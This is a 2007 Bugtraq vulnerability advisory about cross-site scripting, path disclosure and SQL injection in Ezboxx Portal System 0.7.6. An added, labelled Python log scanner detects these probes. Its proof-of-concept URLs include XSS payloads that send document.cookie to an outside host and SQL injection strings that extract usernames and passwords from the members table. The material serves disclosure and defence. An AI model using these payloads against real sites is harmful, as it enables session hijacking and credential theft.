Message-ID: <20070111215955.26433.qmail@securityfocus.com>
Date: 11 Jan 2007 21:59:55 -0000
From: Info@...Sec.com
To: bugtraq@...urityfocus.com
Subject: Ezboxx multiple vulnerabilities.

Ezboxx multiple vulnerabilities.

Vulnerable version:
Ezboxx Portal System Beta v 0.7.6 and below.
Ezboxx Portal System Beta v 0.7.6 and earlier versions are vulnerable to cross-site scripting, path disclosure and SQL injection attacks.

Cross-site scripting:
----------------------
Description:
Input passed to the parameters "pic" (in "piczoom.asp"), "nocatname" (in "user-upload.asp") and "iid" (in "newscomments.asp")
is not properly verified before being returned to the user as HTML code.
Therefore an attacker may use one of these cross-site scripting flaws to execute arbitrary script code in the browser of the site's users.

Proof-of-concept:
http://[Host]/ezboxx/custom/piczoom.asp?pic=[XSS]
http://[Host]/ezboxx/boxx/user-upload.asp?nocatname=[XSS] - Login required
http://[Host]//ezboxx/indexes/newscomments.asp?iid=[XSS]

Examples:
http://[Host]/ezboxx/custom/piczoom.asp?pic=BugSec'+onerror='window.open("http://www.BugSec.com/Index.php?Security_Consulting_Company=Penetration-Testing&Cookie="+document.cookie)
http://[Host]/ezboxx/boxx/user-upload.asp?nocatname='><script>location.href='http://www.BugSec.com/Index.php?Info-Sec=Pen_Test&Cookie='+document.cookie</script>
http://[Host]/ezboxx/indexes/newscomments.asp?iid=200/*<script>location.href='http://www.BugSec.com/Index.php?Information-Security=Application_Security&Cookie='+document.cookie</script>*/


Path disclosure:
------------------
Description:
Path information is disclosed in error pages when invalid (non-numeric) input is passed to the parameter "cat" in "knowledgebase.asp".

Proof-of-concept:
http://[Host]/ezboxx/boxx/knowledgebase.asp?iid=549&Cat=notnumber
http://[Host]/ezboxx/boxx/knowledgebase.asp?iid=1&Cat=notnumber

Examples:
http://[Host]/ezboxx/boxx/knowledgebase.asp?iid=549&Cat=exam
http://[Host]/ezboxx/boxx/knowledgebase.asp?Type=1&Cat=exam


SQL Injection:
-------------------
Description:
Input passed to the "iid" parameter in "ShowAppendix.asp" is not properly verified before being used in SQL queries, so arbitrary SQL code can be injected to manipulate those queries.
An attacker may use this vulnerability to extract any information (such as account passwords) from the database.

Proof-of-concept:
http://[Host]/ezboxx/boxx/ShowAppendix.asp?iid=[SQL]

Example:
http://[Host]/ezboxx/boxx/ShowAppendix.asp?iid=convert(int,(select+TOP+1+username+from+members))
http://[Host]/ezboxx/boxx/ShowAppendix.asp?iid=convert(int,(select+TOP+1+password+from+members))
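As an added defender-side example (not part of this advisory or of the Ezboxx code), the following Python flags web-server log entries that probe the parameters named in the three sections above: markup in the parameters that are reflected into HTML, and non-numeric values where the application expects an integer. It assumes IIS W3C-style log lines with the fields date, time, method, uri-stem, uri-query and status; the sample lines are constructed, not real traffic.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Endpoints and parameters named in the advisory. "int": the page expects a
# number; "text": the value is reflected into HTML, so markup is suspicious.
WATCHED = {
    "piczoom.asp": {"pic": "text"},
    "user-upload.asp": {"nocatname": "text"},
    "newscomments.asp": {"iid": "int"},
    "knowledgebase.asp": {"cat": "int", "iid": "int"},
    "showappendix.asp": {"iid": "int"},
}
MARKUP = re.compile(r"[<>'\"]|javascript:|on\w+=", re.IGNORECASE)

def check_request(uri_stem, query):
    """Return findings for one request (empty list if nothing suspicious)."""
    script = uri_stem.rsplit("/", 1)[-1].lower()
    rules = WATCHED.get(script)
    if not rules:
        return []
    # parse_qs decodes once; decode again so double-encoded payloads
    # such as %253C do not slip past the character checks.
    params = {k.lower(): [unquote_plus(v) for v in vs]
              for k, vs in parse_qs(query, keep_blank_values=True).items()}
    findings = []
    for name, kind in rules.items():
        for value in params.get(name, []):
            if kind == "int" and not value.isdigit():
                findings.append(f"{script} {name}={value!r}: non-numeric integer parameter")
            elif kind == "text" and MARKUP.search(value):
                findings.append(f"{script} {name}={value!r}: markup in reflected parameter")
    return findings

def scan_log(lines):
    """Scan W3C lines (date time method uri-stem uri-query status) -> [(status, finding)]."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 6 or parts[0].startswith("#"):
            continue  # directive/comment line or truncated entry
        stem, query, status = parts[3], parts[4], parts[5]
        for finding in check_request(stem, "" if query == "-" else query):
            hits.append((status, finding))
    return hits

# Constructed sample log (not real traffic); the probes mirror the advisory's PoC shapes.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query sc-status
2007-01-11 21:59:55 GET /ezboxx/custom/piczoom.asp pic=sunset.jpg 200
2007-01-11 22:00:01 GET /ezboxx/custom/piczoom.asp pic=x%27%20onerror%3D%27alert(1) 200
2007-01-11 22:00:07 GET /ezboxx/boxx/knowledgebase.asp iid=549&Cat=notnumber 500
2007-01-11 22:00:12 GET /ezboxx/boxx/ShowAppendix.asp iid=convert(int%2C(select+1)) 500
""".splitlines()
```

Running `scan_log(SAMPLE_LOG)` reports the three probe lines and ignores the benign first request; a 500 status on a flagged request is a useful secondary signal, since the path disclosure above surfaces in exactly those error pages.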


Credit:
Doron P and Eyal G from BugSec
Tel:+97239622655
Fax:+97239619351
Email:Info [^A-t] BugSec \*D.O.T*\ com
BugSec LTD. - www.BugSec.com
Security Consulting Company
